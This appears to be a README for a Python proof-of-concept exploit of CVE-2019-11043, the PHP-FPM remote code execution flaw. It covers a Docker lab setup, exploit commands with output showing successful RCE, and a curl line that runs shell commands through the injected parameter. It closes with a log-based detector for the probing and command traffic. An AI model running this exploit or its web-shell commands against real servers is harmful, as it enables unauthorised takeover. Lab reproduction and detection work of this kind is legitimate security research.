(PoC) Python version of CVE-2019-11043 exploit by neex
PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit by neex: https://github.com/neex/phuip-fpizdam
This PoC is still a draft; please use the exploit written by @neex.
Vulnerability analysis: https://paper.seebug.org/1064/

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

If you want to read the php-fpm logs, you can run:

docker logs --tail 10 --follow php

Exploit

# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

If you only want to check for the vulnerability, skipping the exploit:

python3 exploit.py --url http://localhost/index.php --skip-rce

You can try to kill the php-fpm process and reset all injected PHP settings with --reset:

python3 exploit.py --url http://localhost/index.php --reset
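From the defender's side, the run above leaves two recognisable traces in the web server's access log: a burst of requests to the same .php script with query strings around the QSL candidates (1752, 1757, 1762) while the script hunts for the right length, followed by commands passed in the `a=` parameter (`?a=bin/ls+/`). The detector below is an added example and not part of this repository; it assumes a default nginx combined-style log format, a QSL window of 1700-1800 bytes, and uses constructed log lines.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed nginx access-log lines modelled on the traffic this PoC generates:
# a benign request, two QSL probes against index.php, then the RCE marker.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/Oct/2019:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [29/Oct/2019:10:00:02 +0000] "GET /index.php?' + "Q" * 1752 + ' HTTP/1.1" 502 0',
    '10.0.0.9 - - [29/Oct/2019:10:00:03 +0000] "GET /index.php?' + "Q" * 1762 + ' HTTP/1.1" 200 0',
    '10.0.0.9 - - [29/Oct/2019:10:00:05 +0000] "GET /index.php?a=bin/ls+/ HTTP/1.1" 200 1337',
]

# Minimal parser for the default nginx "combined" request line prefix.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)

# Assumption: the PoC's QSL candidates (1752, 1757, 1762) fall in this window; tune per deployment.
QSL_MIN, QSL_MAX = 1700, 1800


def analyze_line(line):
    """Return a list of finding strings for one access-log line (empty if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m["target"])
    # Only requests that reach PHP-FPM via a .php script are relevant here.
    if not parts.path.endswith(".php"):
        return []
    findings = []
    # Stage 1: query-string-length probing against the script.
    qsl = len(parts.query)
    if QSL_MIN <= qsl <= QSL_MAX:
        findings.append(f"{m['ip']} qsl-probe len={qsl} path={parts.path}")
    # Stage 2: the post-exploitation marker this PoC uses (?a=<command>).
    # The parameter name is specific to this PoC, so treat this as a weak, PoC-specific signal.
    for value in parse_qs(parts.query).get("a", []):
        cmd = unquote(value)
        if "bin/" in cmd:
            findings.append(f"{m['ip']} rce-marker cmd={cmd} path={parts.path}")
    return findings


def analyze_log(lines):
    """Run analyze_line over every line and flatten the findings."""
    return [f for line in lines for f in analyze_line(line)]
```

Running analyze_log(SAMPLE_LOG) reports the two QSL probes and the command marker from 10.0.0.9 and nothing for the benign request; correlating probes and markers per source address is what makes the signal useful in practice.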

Video PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265
